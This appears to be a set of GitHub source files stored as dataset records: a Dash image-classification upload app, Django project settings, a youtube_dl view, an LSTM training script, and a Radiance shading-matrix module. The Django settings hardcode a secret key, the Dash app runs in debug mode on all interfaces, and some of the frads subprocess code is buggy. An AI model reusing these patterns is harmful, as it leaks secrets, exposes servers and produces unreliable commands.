auto'})\n\n\n@server.route(\"/data/images/\")\ndef download(filename):\n \"\"\"Serve a file from the upload directory.\"\"\"\n return send_from_directory(directory='/data/images', filename=filename)\n #return send_from_directory(directory='/data/images', filename=filename, as_attachment=True)\n\ndef save_file(name, content):\n \"\"\"Decode and store a file uploaded with Plotly Dash.\"\"\"\n data = content.encode(\"utf8\").split(b\";base64,\")[1]\n with open(os.path.join(IMAGES_DIRECTORY, name), \"wb\") as fp:\n fp.write(base64.decodebytes(data))\n\ndef uploaded_files():\n \"\"\"List the files in the upload directory.\"\"\"\n files = []\n for filename in os.listdir(IMAGES_DIRECTORY):\n path = os.path.join(IMAGES_DIRECTORY, filename)\n if os.path.isfile(path):\n files.append(filename)\n return files\n\n\ndef file_download_link(filename, label):\n \"\"\"Create a Plotly Dash 'A' element that downloads a file from the app.\"\"\"\n location = \"{}/{}\".format(IMAGES_DIRECTORY, urlquote(filename))\n return html.A(label + ' - ' + filename, href=location, target=\"_blank\")\n\n\n@app.callback(\n Output(\"files-db\", \"data\"),\n [Input(\"upload-data\", \"filename\"), Input(\"upload-data\", \"contents\")],\n [State('files-db', 'data')]\n)\ndef update_db_disk(uploaded_filenames, uploaded_file_contents, data):\n \"\"\"Save uploaded files and regenerate the file list.\"\"\"\n\n if data is None:\n data = {}\n \n if not uploaded_filenames is None and not uploaded_file_contents is None:\n files = zip(uploaded_filenames, uploaded_file_contents)\n else:\n files = []\n \n messages = [\n {\"filename\" : name, \"image\" : str(data) }\n for name, data in files\n ]\n\n for m in messages:\n save_file(m['filename'], m['image'])\n\n api_calls = [\n requests.post(url=\"http://mlapi:8000/guess\", json=m)\n for m in messages\n ]\n\n with open('/errors', 'w') as f:\n for c in api_calls:\n if c.status_code == 200:\n f.write(str(c) + '\\n')\n\n labels = [\n call.json() if call.status_code == 200 else None\n for call in api_calls\n ]\n\n \n labels = list(filter(None, labels))\n\n for d in labels:\n data[d['filename']] = d['label']\n \n return data\n\n\n@app.callback(\n Output(\"file-list\", \"children\"),\n [Input(\"files-db\", \"data\")],\n)\ndef update_list(labels):\n \"\"\" File list. \"\"\"\n\n if labels is None or len(labels) == 0:\n return [html.Li(\"No files yet!\")]\n else:\n return [\n html.Li( file_download_link(f, labels[f]) )\n for f in labels\n ]\n\n\n@app.callback(\n Output(\"cats-dogs\", \"figure\"),\n [Input(\"files-db\", \"data\")],\n)\ndef update_graph(labels):\n \"\"\" Histogram of current files \"\"\"\n if labels is None:\n labels = {}\n \n\n hist = go.Histogram(\n x = list(labels.values()),\n marker = {'colorscale': 'Viridis'},\n name = 'Cats v.s. Dogs'\n )\n\n return {\n 'data': [hist],\n 'layout': go.Layout(title='Cats v.s. Dogs'),\n }\n\n \n \n\nif __name__ == \"__main__\":\n app.run_server(debug=True, host=\"0.0.0.0\", port=8888)\n","repo_name":"blairdrummond/docker-workshop","sub_path":"dash/app/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5251,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"1705130452","text":"import os\n\nimport dj_database_url\nimport environ\n\nenv = environ.Env(DEBUG=(bool, False))\nsite_root = environ.Path(__file__) - 2\nif os.path.exists(site_root(\"meetenjoy\", \".env\")):\n environ.Env.read_env()\n# Build paths inside the project like this: os.path.join(BASE_DIR, ...)\nBASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))\n\nSECRET_KEY = 'zc9j11-&pu=&k*zlbo5kel6ua&=r+#oij$ao!yle1v@0o6jnyn'\n\nDEBUG = env(\"DEBUG\", default=False)\n\nUSE_SWAGGER = env.bool(\"USE_SWAGGER\", default=True)\nUSE_SEARCH = env.bool(\"USE_SEARCH\", default=False)\nFIRST_SERVICE_URL = env.str(\"FIRST_SERVICE_URL\", default=\"\")\nSECOND_SERVICE_URL = env.str(\"SECOND_SERVICE_URL\", default=\"\")\nTHIRD_SERVICE_URL = env.str(\"THIRD_SERVICE_URL\", default=\"\")\nFIRST_SERVICE_RETRIES = env.int(\"FIRST_SERVICE_RETRIES\", default=1)\nSECOND_SERVICE_RETRIES = env.int(\"SECOND_SERVICE_RETRIES\", default=1)\nTHIRD_SERVICE_RETRIES = env.int(\"THIRD_SERVICE_RETRIES\", default=1)\nCACHE_EXPIRES = env.int(\"CACHE_EXPIRES\", default=60 * 5) # seconds\n\nALLOWED_HOSTS = [\n \"meetenjoy.herokuapp.com\",\n \"localhost\",\n \"127.0.0.1\",\n]\n\nINSTALLED_APPS = [\n 'django.contrib.admin',\n 'django.contrib.auth',\n 'django.contrib.contenttypes',\n 'django.contrib.sessions',\n 'django.contrib.messages',\n 'django.contrib.staticfiles',\n 'django.contrib.sites',\n\n 'rest_framework',\n 'rest_framework.authtoken',\n 'rest_auth',\n 'rest_auth.registration',\n \"drf_yasg\",\n \"rest_framework_swagger\",\n 'allauth',\n 'allauth.account',\n 'django_extensions',\n 'django_filters',\n\n 'accounts',\n 'aggregator',\n 'meetings',\n 'notifications',\n]\n\nEMAIL_BACKEND = 'django.core.mail.backends.console.EmailBackend'\n\nSITE_ID = 1\n\nMIDDLEWARE = [\n 'django.middleware.security.SecurityMiddleware',\n 'django.contrib.sessions.middleware.SessionMiddleware',\n 'django.middleware.common.CommonMiddleware',\n 'django.middleware.csrf.CsrfViewMiddleware',\n 'django.contrib.auth.middleware.AuthenticationMiddleware',\n 'django.contrib.messages.middleware.MessageMiddleware',\n 'django.middleware.clickjacking.XFrameOptionsMiddleware',\n]\n\nROOT_URLCONF = 'meetenjoy.urls'\n\nTEMPLATES = [\n {\n 'BACKEND': 'django.template.backends.django.DjangoTemplates',\n 'DIRS': [],\n 'APP_DIRS': True,\n 'OPTIONS': {\n 'context_processors': [\n 'django.template.context_processors.debug',\n 'django.template.context_processors.request',\n 'django.contrib.auth.context_processors.auth',\n 'django.contrib.messages.context_processors.messages',\n ],\n },\n },\n]\n\nWSGI_APPLICATION = 'meetenjoy.wsgi.application'\nDATABASES = {\n 'default': dj_database_url.config(default=env.str(\"DATABASE_URL\"))\n}\n\nAUTH_PASSWORD_VALIDATORS = [\n {\n 'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',\n },\n {\n 'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',\n },\n {\n 'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',\n },\n {\n 'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',\n },\n]\n\nREST_FRAMEWORK = {\n 'DEFAULT_AUTHENTICATION_CLASSES': [\n 'rest_framework.authentication.TokenAuthentication',\n ],\n 'DEFAULT_PAGINATION_CLASS': 'rest_framework.pagination.LimitOffsetPagination',\n 'PAGE_SIZE': 100,\n 'DEFAULT_FILTER_BACKENDS': ['django_filters.rest_framework.DjangoFilterBackend']\n}\n\nSTATIC_ROOT = os.path.join(BASE_DIR, 'staticfiles/')\nSTATIC_URL = \"/static/\"\n\nMEDIA_ROOT = os.path.join(BASE_DIR, 'media/')\nMEDIA_URL = '/media/'\n\nLANGUAGE_CODE = 'en-us'\n\nTIME_ZONE = 'UTC'\n\nUSE_I18N = True\n\nUSE_L10N = True\n\nUSE_TZ = True\n\nAUTH_USER_MODEL = 'accounts.User'\n\nDOU_LOAD_CRONTAB = env.dict(\"DOU_LOAD_CRONTAB\", default={\"hour\": 6, \"minute\": 1})\nDOU_MEETUP_CRONTAB = env.dict(\"DOU_MEETUP_CRONTAB\", default={\"hour\": 6, \"minute\": 1})\nUPDATE_MEETING_STATUSES_CRONTAB = env.dict(\"UPDATE_MEETING_STATUSES_CRONTAB\", default={\"minute\": 30})\n\n# REDIS_HOST = env.str(\"REDIS_HOST\", default=\"redis\")\n# REDIS_PORT = env.int(\"REDIS_PORT\", default=6379)\n\n# CELERY_RESULT_BACKEND = CELERY_BROKER_URL = \"redis://{host}:{port}/0\".format(\n# host=REDIS_HOST, port=REDIS_PORT\n# )\n","repo_name":"InvisibleTraveler/KPI-meetup-mob-proj-b","sub_path":"meetenjoy/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":4311,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"27066291806","text":"from django.shortcuts import render\n\n# Create your views here.\nfrom django.views.generic.base import TemplateResponseMixin, View\nimport youtube_dl\n\nfrom core.constants import itag_to_format\n\ndef convert_bytes(size):\n if not size:\n return 0\n for x in ['bytes', 'KB', 'MB', 'GB', 'TB']:\n if size < 1024.0:\n return \"%3.1f %s\" % (size, x)\n size /= 1024.0\n\n return size\n\nclass HomeView(View, TemplateResponseMixin):\n template_name = 'home.html'\n\n def get_video_context(self, url):\n ydl_opts = {}\n result = None\n audio_formats = []\n video_formats = []\n audio_video_formats = []\n not_valid_format = []\n\n with youtube_dl.YoutubeDL(ydl_opts) as ydl:\n result = ydl.extract_info(url, download=False)\n for frmt in result['formats']:\n frmt['h_size'] = convert_bytes(frmt['filesize'])\n # format_id = frmt['format_id']\n # format = itag_to_format.get(format_id, None)\n # if not format:\n # not_valid_format.append(frmt)\n if frmt['vcodec'] != 'none' and frmt['acodec'] != 'none':\n audio_video_formats.append(frmt)\n elif frmt['acodec'] != 'none':\n audio_formats.append(frmt)\n elif frmt['vcodec'] != 'none':\n video_formats.append(frmt)\n\n context = {\n \"result\": result,\n \"url\": url,\n \"audio_formats\": audio_formats,\n \"video_formats\": video_formats,\n \"audio_video_formats\": audio_video_formats\n }\n return context\n\n def get(self, request):\n context = {}\n url = request.GET.get('youtube_url', None)\n if url:\n context = self.get_video_context(url)\n return self.render_to_response(context)\n","repo_name":"shourav9884/youtube_dl_django","sub_path":"core/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1881,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"53"} +{"seq_id":"18781172439","text":"from unicodedata import bidirectional\nimport torch\nimport torch.nn as nn\nimport torch.optim as optim\nimport torch.nn.functional as F\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom torch.autograd import Variable\n\ndevice = torch.device('cuda:0' if torch.cuda.is_available() else 'cpu')\n\nclass LSTM(nn.Module):\n def __init__(self, input_size, hidden_size, num_layers):\n super(LSTM, self).__init__()\n\n self.num_layers = num_layers\n self.input_size = input_size\n self.hidden_size = hidden_size\n\n self.lstm = nn.LSTM(input_size=input_size, hidden_size=hidden_size,\n num_layers=num_layers, batch_first=True) #lstm\n self.fc_1 = nn.Linear(hidden_size, 128)\n self.fc = nn.Linear(128, input_size)\n self.relu = nn.ReLU()\n\n def forward(self, x):\n h_0 = Variable(torch.zeros(self.num_layers, x.size(0), self.hidden_size)).to(device) #hidden state\n c_0 = Variable(torch.zeros(self.num_layers, x.size(0), self.hidden_size)).to(device) #internal state\n # Propagate input through LSTM\n output, (hn, cn) = self.lstm(x, (h_0, c_0)) #lstm with input, hidden, and internal state\n hn = hn.view(-1, self.hidden_size) #reshaping the data for Dense layer next\n out = self.relu(hn)\n out = self.fc_1(out) #first Dense\n out = self.relu(out) #relu\n out = self.fc(out) #Final Output\n return out\n\ntrain_set = np.load('train.npy', allow_pickle=True)\nval_set = np.load('val.npy', allow_pickle=True)\nprint(np.shape(train_set))\n\ntraining_targets = []\ntraining_inputs = []\nend_token = np.zeros((1, 20))\n\nbatch_size = 256\nmax_seq_len = 100\nbatch_targets = []\nbatch_inputs = []\n# quick way to implement batches, should do this better\nfor i in range(len(train_set)):\n\n # create the batches and convert to tensors\n if i % batch_size == 0 and i != 0:\n training_targets.append(torch.cat(batch_targets, dim=0))\n training_inputs.append(batch_inputs)\n # reset\n batch_targets = []\n batch_inputs = []\n\n # Get the one hot of the second to last character (before end character)\n one_hot_target = torch.Tensor(np.array(train_set[i][-2]))\n # Get it in the form of an index for cross entropy\n batch_targets.append((one_hot_target == 1).nonzero(as_tuple=True)[0])\n # Remove the last two characters\n cur_sequence = np.array(train_set[i][:-2])\n # Get up to max_seq_len elements from the end of the sequence\n if len(cur_sequence) > max_seq_len:\n cur_sequence = cur_sequence[-max_seq_len:]\n # concatenate the remaining sequence with the end token\n if len(cur_sequence) == 0:\n cur_sequence = np.copy(end_token)\n else:\n cur_sequence = np.concatenate((cur_sequence, end_token), axis=0)\n\n # append to batch list\n batch_inputs.append(cur_sequence)\n\n# Standard training components\nmodel = LSTM(20, 60, 4).to(device)\nlr = .001\nepochs = 100\ncriterion = nn.CrossEntropyLoss()\noptimizer = optim.Adam(model.parameters(), lr=lr)\n\nfor epoch in range(epochs):\n # keep track of epoch loss\n running_loss = 0\n correct = 0\n for sequences, targets in zip(training_inputs, training_targets):\n # Pad batch\n for i, sequence in enumerate(sequences):\n if len(sequence) < max_seq_len + 1:\n pads = np.zeros((max_seq_len - sequence.shape[0] + 1, sequence.shape[1]))\n sequences[i] = np.concatenate((pads, sequence), axis=0)\n sequences = torch.Tensor(np.array(sequences))\n\n # Move data to devices\n sequences, targets = sequences.to(device), targets.to(device)\n\n optimizer.zero_grad()\n predictions = model(sequences)\n # Get the final hidden state for the batch, should be the last 256\n predictions = predictions[-256:]\n loss = criterion(predictions, targets)\n\n # Getting predictions and training accuracy\n preds = predictions.argmax(dim=1, keepdim=True) # get the index of the max log-probability\n correct += preds.eq(targets.view_as(preds)).sum().item()\n\n # keep track of loss\n running_loss += loss.item()\n # Update parameters\n loss.backward()\n optimizer.step()\n\n running_loss /= len(training_inputs)\n print(\"Epoch {} training loss: {}, Training acc: {}\".format(epoch, running_loss, 100 * correct / (len(training_inputs)*256)))\n","repo_name":"JohnLazzari/LSTM-Amino-Acids","sub_path":"LSTM.py","file_name":"LSTM.py","file_ext":"py","file_size_in_byte":4396,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"31369100136","text":"#!/usr/bin/env python\n\"\"\"\nThis module contains functionalities relating to generating matrices for\nnon-coplanar shading systems\n\"\"\"\n\nfrom dataclasses import dataclass\nimport logging\nimport math\nimport os\nfrom pathlib import Path\nimport subprocess as sp\nimport tempfile as tf\nfrom typing import List\nfrom typing import Optional\nfrom typing import Sequence\n\nimport pyradiance as pr\nfrom frads import matrix\nfrom frads import geom\n\n# from frads.types import Primitive\n# from frads.types import NcpModel\nfrom frads import utils\nimport numpy as np\n\nlogger: logging.Logger = logging.getLogger(\"frads.mfacade\")\n\n\n@dataclass\nclass NcpModel:\n \"\"\"Non-coplanar data model.\"\"\"\n\n windows: Sequence[pr.Primitive]\n ports: List[pr.Primitive]\n env: List[Path]\n sbasis: str\n rbasis: str\n\n\ndef ncp_compute_back(\n model: NcpModel, src: dict, opt: Optional[List[str]] = None, refl: bool = False\n) -> None:\n \"\"\"compute front side calculation(backwards).\"\"\"\n logger.info(\"Computing for front side\")\n for idx, wp in enumerate(model.windows):\n logger.info(\"Front transmission for window %s\", idx)\n front_rcvr = matrix.SurfaceReceiver(\n surfaces=model.ports,\n basis=model.rbasis,\n left_hand=True,\n offset=None,\n source=\"glow\",\n out=src[f\"tb{idx}\"],\n )\n # sndr_prim = utils.polygon2prim(wplg, 'fsender', f'window{idx}')\n sndr = matrix.SurfaceSender(\n surfaces=[wp], basis=model.sbasis, left_hand=True, offset=None\n )\n if refl:\n logger.info(\"Front reflection for window %s\", idx)\n wflip = utils.parse_polygon(wp).flip()\n wflip_prim = utils.polygon2prim(wflip, \"breceiver\", f\"window{idx}\")\n back_rcvr = matrix.SurfaceReceiver(\n surfaces=[wflip_prim],\n basis=\"-\" + model.rbasis,\n left_hand=False,\n offset=None,\n source=\"glow\",\n out=src[f\"rb{idx}\"],\n )\n front_rcvr += back_rcvr\n matrix.rfluxmtx(sender=sndr, receiver=front_rcvr, env=model.env, opt=opt)\n\n\ndef ncp_compute_front(model: NcpModel, src_dict, opt, refl: bool = False) -> None:\n \"\"\"compute back side calculation.\"\"\"\n sndr_prim = []\n for p in model.ports:\n np = pr.Primitive(\n p.modifier,\n p.ptype,\n p.identifier,\n p.str_arg,\n geom.parse_polygon(p.real_arg).flip().to_real(),\n )\n sndr_prim.append(np)\n sndr = matrix.surface_as_sender(\n prim_list=sndr_prim, basis=\"-\" + model.rbasis, offset=None, left=False\n )\n logger.info(\"Computing for back side\")\n for idx, wp in enumerate(model.windows):\n logger.info(\"Back transmission for window %s\", idx)\n wplg = geom.parse_polygon(wp.real_arg).flip()\n rcvr_prim = utils.polygon2prim(wplg, \"breceiver\", f\"window{idx}\")\n rcvr = matrix.surface_as_receiver(\n prim_list=[rcvr_prim],\n basis=\"-\" + model.sbasis,\n left=False,\n offset=None,\n source=\"glow\",\n out=src_dict[f\"tf{idx}\"],\n )\n if refl:\n logger.info(\"Back reflection for window %s\", idx)\n # brcvr_prim = [utils.polygon2prim(plg, \"freceiver\", \"window\" + str(i))\n # for i, pp in enumerate(model.ports)]\n brcvr = matrix.surface_as_receiver(\n prim_list=model.ports,\n basis=model.rbasis,\n left=False,\n offset=None,\n source=\"glow\",\n out=src_dict[f\"rf{idx}\"],\n )\n rcvr += brcvr\n matrix.rfluxmtx(sender=sndr, receiver=rcvr, env=model.env, opt=opt)\n\n\ndef klems_wrap(model, src_dict, fwrap_dict, out) -> None:\n \"\"\"prepare wrapping for Klems basis.\"\"\"\n for key in src_dict:\n for _, _ in enumerate(model.windows):\n inp = src_dict[key]\n rcmd = [\"rmtxop\", \"-fa\", \"-t\", \"-c\", \".265\", \".67\", \".065\", inp]\n ps1 = sp.run(rcmd, check=True, stdout=sp.PIPE)\n with open(fwrap_dict[key], \"wb\") as wtr:\n sp.run([\"getinfo\", \"-\"], check=True, input=ps1.stdout, stdout=wtr)\n for i, _ in enumerate(model.windows):\n out_name = out.parent / (out.stem + f\"{i}.xml\")\n sub_dict = {k: fwrap_dict[k] for k in fwrap_dict if k.endswith(str(i))}\n cmd = [\"wrapBSDF\", \"-a\", model.rbasis, \"-c\"]\n for i, j in sub_dict.items():\n cmd.append(\"-\" + i[:2])\n cmd.append(str(j))\n logger.info(\"Calling wrapBSDF with:\\n%s\", \" \".join(cmd))\n with open(out_name, \"wb\") as wtr:\n sp.run(cmd, check=True, stdout=wtr)\n\n\n# def klems_wrap2(out, out2, inp, basis):\n# \"\"\"prepare wrapping for Klems basis.\"\"\"\n# cmd = f\"rmtxop -fa -t -c .265 .67 .065 {inp} | getinfo - > {out}\"\n# sp.run(cmd, shell=True)\n# basis_dict = {\"kq\": \"Klems Quarter\", \"kh\": \"Klems Half\", \"kf\": \"Klems Full\"}\n# coeff = utils.angle_basis_coeff(basis_dict[basis])\n# with open(out, \"r\") as rdr:\n# rows = [map(float, l.split()) for l in rdr.readlines()]\n# res = [[str(val / c) for val in row] for row, c in zip(rows, coeff)]\n# with open(out2, \"w\") as wtr:\n# [wtr.write(\"\\t\".join(row) + \"\\n\") for row in res]\n\n\ndef rttree_reduce(\n ttrank, ttlog2, pctcull, refl, src: str, dest, spec: str = \"Visible\"\n) -> None:\n \"\"\"call rttree_reduce to reduce shirley-chiu to tensor tree.\n translated from genBSDF.pl.\n \"\"\"\n CIEuv = (\n \"Xi=.5141*Ri+.3239*Gi+.1620*Bi;Yi=.2651*Ri+.6701*Gi+.0648*Bi;\"\n \"Zi=.0241*Ri+.1229*Gi+.8530*Bi;den=Xi+15*Yi+3*Zi;\"\n \"uprime=if(Yi,4*Xi/den,4/19);vprime=if(Yi,9*Yi/den,9/19);\"\n )\n\n ns2 = int((2**ttlog2) ** 2)\n if spec == \"Visible\":\n cmd = [\n \"rcalc\",\n \"-e\",\n f\"Omega:PI/{ns2}\",\n \"-e\",\n \"Ri=$1;Gi=$2;Bi=$3\",\n \"-e\",\n CIEuv,\n \"-e\",\n \"$1=Yi/Omega\",\n ]\n elif spec == \"CIE-u\":\n cmd = [\"rcalc\", \"-e\", \"Ri=$1;Gi=$2;Bi=$3\", \"-e\", CIEuv, \"-e\", \"$1=uprime\"]\n elif spec == \"CIE-v\":\n cmd = [\"rcalc\", \"-e\", \"Ri=$1;Gi=$2;Bi=$3\", \"-e\", CIEuv, \"-e\", \"$1=vprime\"]\n\n if os.name == \"posix\":\n cmd.insert(1, \"-if3\")\n if pctcull >= 0:\n avg = \"-a\" if refl else \"\"\n pcull = pctcull if spec == \"Visible\" else (100 - (100 - pctcull) * 0.25)\n rtcmd = [\n \"rttree_reduce\",\n avg,\n \"-h\",\n \"-ff\",\n \"-t\",\n pcull,\n \"-r\",\n ttrank,\n \"-g\",\n ttlog2,\n ]\n if os.name == \"posix\":\n cmd.extend([\"-of\", src])\n ps1 = sp.run(cmd + [\"-of\", src], check=True, stdout=sp.PIPE)\n with open(dest, \"wb\") as wtr:\n ps2 = sp.run(rtcmd, check=True, input=ps1.stdout, stdout=wtr)\n else:\n ps1 = sp.run(\n [\"rcollate\", \"-ho\", \"-oc\", \"1\", src], check=True, stdout=sp.PIPE\n )\n ps2 = sp.run(cmd, check=True, input=ps1.stdout, stdout=sp.PIPE)\n with open(dest, \"wb\") as wtr:\n sp.run(rtcmd, check=True, input=ps2.stdout, stdout=wtr)\n else:\n if os.name == \"posix\":\n with open(dest, \"wb\") as wtr:\n sp.run(cmd.append(src), check=True, stdout=wtr)\n else:\n ps1 = sp.run(\n [\"rcollate\", \"-ho\", \"-oc\", \"1\", src], check=True, stdout=sp.PIPE\n )\n with open(dest, \"wb\") as wtr:\n sp.run(cmd, check=True, input=ps1.stdout, stdout=wtr)\n\n\ndef tt_wrap(model, src_dict, fwrap_dict, out, refl) -> None:\n \"\"\"call wrapBSDF to wrap a XML file.\"\"\"\n sc = int(model.rbasis[2:])\n ttlog2 = math.log(sc, 2)\n assert ttlog2 % int(ttlog2) == 0\n ttrank = 4 # only anisotropic\n pctcull = 90\n ttlog2 = int(ttlog2)\n for i, _ in enumerate(model.windows):\n sub_key = [k for k in src_dict if k.endswith(str(i))]\n sub_dict = {k: fwrap_dict[k] for k in sub_key}\n for key in sub_key:\n rttree_reduce(ttrank, ttlog2, pctcull, refl, src_dict[key], fwrap_dict[key])\n cmd = [\"wrapBSDF\", \"-a\", \"t4\", \"-s\", \"Visible\"]\n cmd += [\" \".join((\"-\" + i[:2], str(j))) for i, j in sub_dict.items()]\n cmd += f\"> {out}.xml\"\n with open(out, \"wb\") as wtr:\n sp.run(cmd, check=True, stdout=wtr)\n\n\ndef gen_ncp_mtx(\n model: NcpModel,\n out: Path,\n opt: Optional[List[str]] = None,\n refl: bool = False,\n forw: bool = False,\n wrap: bool = True,\n # solar=False,\n) -> None:\n \"\"\"Generate a set of non-coplanar shading matrices.\"\"\"\n\n # Collect all the primitives\n # all_prims = []\n # for path in model.env:\n # all_prims.extend(utils.unpack_primitives(path))\n\n # # Find out the modifier of the ncp polygon\n # ncp_mod = [prim.modifier for prim in ncp_prims if prim.ptype == \"polygon\"][0]\n\n # # Find out the ncp material primitive\n # ncp_mat: Primitive\n # ncp_type: str = \"\"\n # for prim in all_prims:\n # if prim.identifier == ncp_mod:\n # ncp_mat = prim\n # ncp_type = prim.ptype\n # break\n # if ncp_type == \"\":\n # raise ValueError(\"Unknown NCP material\")\n\n # dirname = out.parent\n # if solar and ncp_type == \"BSDF\":\n # logger.info(\"Computing for solar and visible spectrum...\")\n # xmlpath = ncp_mat.str_arg.split()[2]\n # td = tf.mkdtemp()\n # with open(xmlpath) as rdr:\n # raw = rdr.read()\n # raw = raw.replace(\n # 'Visible',\n # 'Visible2',\n # )\n # raw = raw.replace(\n # 'Solar',\n # 'Visible',\n # )\n # raw = raw.replace(\n # 'Visible2',\n # 'Solar',\n # )\n # solar_xml_path = os.path.join(td, \"solar.xml\")\n # with open(solar_xml_path, \"w\") as wtr:\n # wtr.write(raw)\n # _strarg = ncp_mat.str_arg.split()\n # _strarg[2] = solar_xml_path\n # solar_ncp_mat = Primitive(\n # ncp_mat.modifier,\n # ncp_mat.ptype,\n # ncp_mat.identifier + \".solar\",\n # \" \".join(_strarg),\n # \"0\",\n # )\n\n # _env_path = os.path.join(td, \"env_solar.rad\")\n # with open(_env_path, \"w\") as wtr:\n # for prim in all_prims:\n # wtr.write(str(prim))\n # outsolar = dirname / (\"_solar_{out.stem}.dat\")\n\n klems = True\n if wrap and (model.rbasis.startswith(\"sc\")) and (model.sbasis.startswith(\"sc\")):\n klems = False\n sc = int(model.rbasis[2:])\n ttlog2 = math.log(sc, 2)\n if ttlog2 % int(ttlog2) != 0:\n raise ValueError(\"Invalid tensor tree resolution.\")\n if opt is not None:\n opt.append(\"-hd\")\n opt.append(\"-ff\")\n with tf.TemporaryDirectory() as td:\n src_dict = {}\n fwrap_dict = {}\n for idx, _ in enumerate(model.windows):\n _tf = f\"tf{idx}\"\n _rf = f\"rf{idx}\"\n _tb = f\"tb{idx}\"\n _rb = f\"rb{idx}\"\n src_dict[_tb] = Path(td, _tb + \".dat\")\n fwrap_dict[_tb] = Path(td, _tb + \"p.dat\")\n if forw:\n src_dict[_tf] = Path(td, _tf + \".dat\")\n fwrap_dict[_tf] = Path(td, _tf + \"p.dat\")\n if refl:\n src_dict[_rb] = Path(td, _rb + \".dat\")\n fwrap_dict[_rb] = Path(td, _rb + \"p.dat\")\n if forw:\n src_dict[_rf] = Path(td, _rf + \".dat\")\n fwrap_dict[_rf] = Path(td, _rf + \"p.dat\")\n ncp_compute_back(model, src_dict, opt, refl=refl)\n if forw:\n ncp_compute_front(model, src_dict, opt, refl=refl)\n if wrap:\n if klems:\n klems_wrap(model, src_dict, fwrap_dict, out)\n else:\n tt_wrap(model, src_dict, fwrap_dict, out, refl)\n else:\n for key, file in src_dict.items():\n out_name = f\"{out.stem}_{key}.mtx\"\n file.rename(out.parent / out_name)\n\n # if solar and ncp_type == \"BSDF\":\n # # process_thread.join()\n # vis_dict = {}\n # sol_dict = {}\n # oname = out.stem\n # mtxs = [\n # os.path.join(dirname, mtx)\n # for mtx in os.listdir(dirname)\n # if mtx.endswith(\".mtx\")\n # ]\n # for mtx in mtxs:\n # _direc = Path(mtx).stem.split(\"_\")[-1][:2]\n # mtxname = Path(mtx).stem\n # if mtxname.startswith(oname):\n # # vis_dict[_direc] = os.path.join(dirname, f\"_vis_{_direc}\")\n # vis_dict[_direc] = os.path.join(td, f\"vis_{_direc}\")\n # out2 = os.path.join(dirname, f\"vis_{_direc}\")\n # klems_wrap(vis_dict[_direc], out2, mtx, args.ss)\n # if mtxname.startswith(\"_solar_\"):\n # sol_dict[_direc] = os.path.join(td, f\"sol_{_direc}\")\n # out2 = os.path.join(dirname, f\"sol_{_direc}\")\n # klems_wrap(sol_dict[_direc], out2, mtx, args.ss)\n # cmd = f\"wrapBSDF -a {args.ss} -c -s Visible \"\n # cmd += \" \".join([f\"-{key} {vis_dict[key]}\" for key in vis_dict])\n # cmd += \" -s Solar \"\n # cmd += \" \".join([f\"-{key} {sol_dict[key]}\" for key in sol_dict])\n # cmd += f\" > {os.path.join(dirname, oname)}.xml\"\n # os.system(cmd)\n # shutil.rmtree(td)\n # [os.remove(mtx) for mtx in mtxs]\n\n\ndef gen_port_prims_from_window_ncp(\n wprim: Sequence[pr.Primitive], nprim: Sequence[pr.Primitive]\n) -> List[pr.Primitive]:\n \"\"\"Generate port primitives from window and non-coplanar shading primitives.\"\"\"\n if len(wprim) > 1:\n awprim = merge_windows(wprim)\n else:\n awprim = wprim[0]\n wplg = geom.parse_polygon(awprim.fargs)\n nplgs = [geom.parse_polygon(p.fargs) for p in nprim if p.ptype == \"polygon\"]\n all_ports = gen_ports_from_window_ncp(wplg, nplgs)\n port_prims = []\n for idx, plg in enumerate(all_ports):\n new_prim = utils.polygon2prim(plg, \"port\", f\"portf{idx+1}\")\n logger.debug(str(new_prim))\n port_prims.append(new_prim)\n return port_prims\n\n\ndef gen_port_prims_from_window(\n wprim: Sequence[pr.Primitive], depth: float, scale_factor: float\n) -> List[pr.Primitive]:\n \"\"\"Generate port primitives from window primitives, depth, and scale factor.\"\"\"\n if len(wprim) > 1:\n awprim = merge_windows(wprim)\n else:\n awprim = wprim[0]\n wpoly = geom.parse_polygon(awprim.fargs)\n extrude_vector = wpoly.normal.reverse().scale(depth)\n scale_vector = geom.Vector(scale_factor, scale_factor, scale_factor)\n scaled_window = wpoly.scale(scale_vector, wpoly.centroid)\n all_ports = scaled_window.extrude(extrude_vector)[1:]\n port_prims = []\n for idx, plg in enumerate(all_ports):\n new_prim = utils.polygon2prim(plg, \"port\", f\"portf{idx+1}\")\n logger.debug(str(new_prim))\n port_prims.append(new_prim)\n return port_prims\n\n\ndef gen_ports_from_window_ncp(\n wp: geom.Polygon, ncp: List[geom.Polygon]\n) -> List[geom.Polygon]:\n \"\"\"\n Generate ports polygons that encapsulate the window and NCP geometries.\n\n window and NCP geometries are rotated around +Z axis until\n the axis-aligned bounding box projected onto XY plane is\n the smallest, thus the systems are facing\n orthogonal direction. A boundary box is then generated with a slight\n outward offset. This boundary box is then rotated back the same amount\n to encapsulate the original window and NCP geomteries.\n \"\"\"\n wn = wp.normal\n if (abs(wn[1]) == 1) or (abs(wn[0]) == 1):\n ncp.append(wp)\n bbox = geom.getbbox(ncp, offset=0.00)\n bbox.remove([b for b in bbox if np.array_equal(b.normal * -1, wn)][0])\n return [b.move(wn * -0.1) for b in bbox]\n xax = [1, 0, 0]\n _xax = [-1, 0, 0]\n yax = [0, 1, 0]\n _yax = [0, -1, 0]\n zaxis = np.array((0, 0, 1))\n rm_pg = [xax, _yax, _xax, yax]\n area_list = []\n win_normals = []\n # Find axiel aligned rotation angle\n bboxes = []\n for deg in range(90):\n rad = math.radians(deg)\n win_polygon_r = wp.rotate(zaxis, rad)\n win_normals.append(win_polygon_r.normal)\n ncs_polygon_r = [p.rotate(zaxis, rad) for p in ncp]\n ncs_polygon_r.append(win_polygon_r)\n _bbox = 